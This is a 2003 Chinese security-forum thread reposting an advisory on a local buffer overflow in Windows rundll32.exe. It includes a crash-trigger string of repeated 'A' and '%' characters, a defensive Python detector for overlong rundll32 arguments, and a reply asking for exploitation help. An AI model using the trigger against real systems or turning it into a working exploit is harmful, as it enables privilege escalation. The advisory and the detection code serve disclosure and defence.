Forum: 菜鸟乐园    Title: Vulnerability advisory: Microsoft rundll32.exe local buffer overflow vulnerability
Author: wj7017654 [wj7017654]    Forum user
Published: 2003-07-06
Updated: 2003-07-11

Affected systems:
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 8114

Microsoft Windows is the windowing operating system developed by Microsoft.

The rundll32.exe shipped with Microsoft Windows does not sufficiently check the arguments supplied by the user; a local attacker can use this flaw to carry out a buffer overflow attack.

When an overly long string is passed to rundll32.exe as an argument, an overflow occurs, which may allow arbitrary instructions to be executed on the system with high privileges.

<*Source: Rick Patel (rikul@bellsouth.net)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105770180515783&w=2
*>

Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Rick Patel (rikul@bellsouth.net) provided the following test method:

rundll32.exe advpack32.dll,<'A'x499>

On a system with the SP4 patch applied, the following method can trigger the overflow:

C:\WINNT\system32>rundll32.exe 
rundll32.exe,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% <-- crashes 0x00250025...

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Microsoft
---------
The vendor has not yet released a patch or upgrade; we recommend that users of this software keep an eye on the vendor's home page for the latest version:
http://www.microsoft.com/technet/security/




OP (地主)    Posted: 07/19 18:54
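As an added example from the defender's side (it is not code from the original post or from the advisory's author), here is a small Python scan over process-creation records that flags rundll32.exe launches showing the pattern described above: an argument far longer than any real "dll,entrypoint" string, or a long run of one repeated character. The record format, the thresholds and the sample lines are all assumptions constructed for this example.

```python
import re

# Constructed sample process-creation records, loosely modelled on Sysmon Event ID 1
# fields (ParentImage|Image|CommandLine); they are not log lines from the original post.
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\rundll32.exe|rundll32.exe advpack32.dll," + "A" * 499,
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\rundll32.exe|rundll32.exe rundll32.exe," + "A" * 250 + "%" * 400,
    r"C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
]

# Thresholds are assumptions for this example: a legitimate "dll,entrypoint args" string
# rarely exceeds a path-sized length, and long runs of one character are filler, not data.
MAX_ARG_LEN = 260
MIN_REPEAT_RUN = 64
_RUNDLL32 = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"\s]*\\)?rundll32(?:\.exe)?"?\s*(.*)$', re.IGNORECASE)

def rundll32_arguments(command_line):
    """Return everything after the rundll32 executable, or None for other programs."""
    m = _RUNDLL32.match(command_line)
    return m.group(1) if m else None

def longest_repeat_run(s):
    """Length of the longest run of one repeated character in s (0 for an empty string)."""
    return max((len(m.group(0)) for m in re.finditer(r"(.)\1*", s)), default=0)

def classify_event(record):
    """Return the reasons this record matches the long-argument pattern ([] = nothing found)."""
    _parent, _image, command_line = record.split("|", 2)
    args = rundll32_arguments(command_line)
    if args is None:
        return []
    reasons = []
    if len(args) > MAX_ARG_LEN:
        reasons.append(f"argument length {len(args)} exceeds {MAX_ARG_LEN}")
    run = longest_repeat_run(args)
    if run >= MIN_REPEAT_RUN:
        reasons.append(f"repeated-character run of {run}")
    return reasons

def scan(records):
    """Map each flagged command line to its reasons; benign records are left out."""
    hits = {}
    for record in records:
        reasons = classify_event(record)
        if reasons:
            hits[record.split("|", 2)[2]] = reasons
    return hits
```

Running scan(SAMPLE_EVENTS) flags only the two long-argument launches; the Control Panel applet launch and the svchost record pass untouched.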

Reply: wj7017654 [wj7017654]   Forum user
Anyone who knows how to exploit this, please show us newbies how to use it.

Floor B1    Posted: 07/19 18:56

Copyright © 2000-2010 20CN Security Group. All Rights Reserved.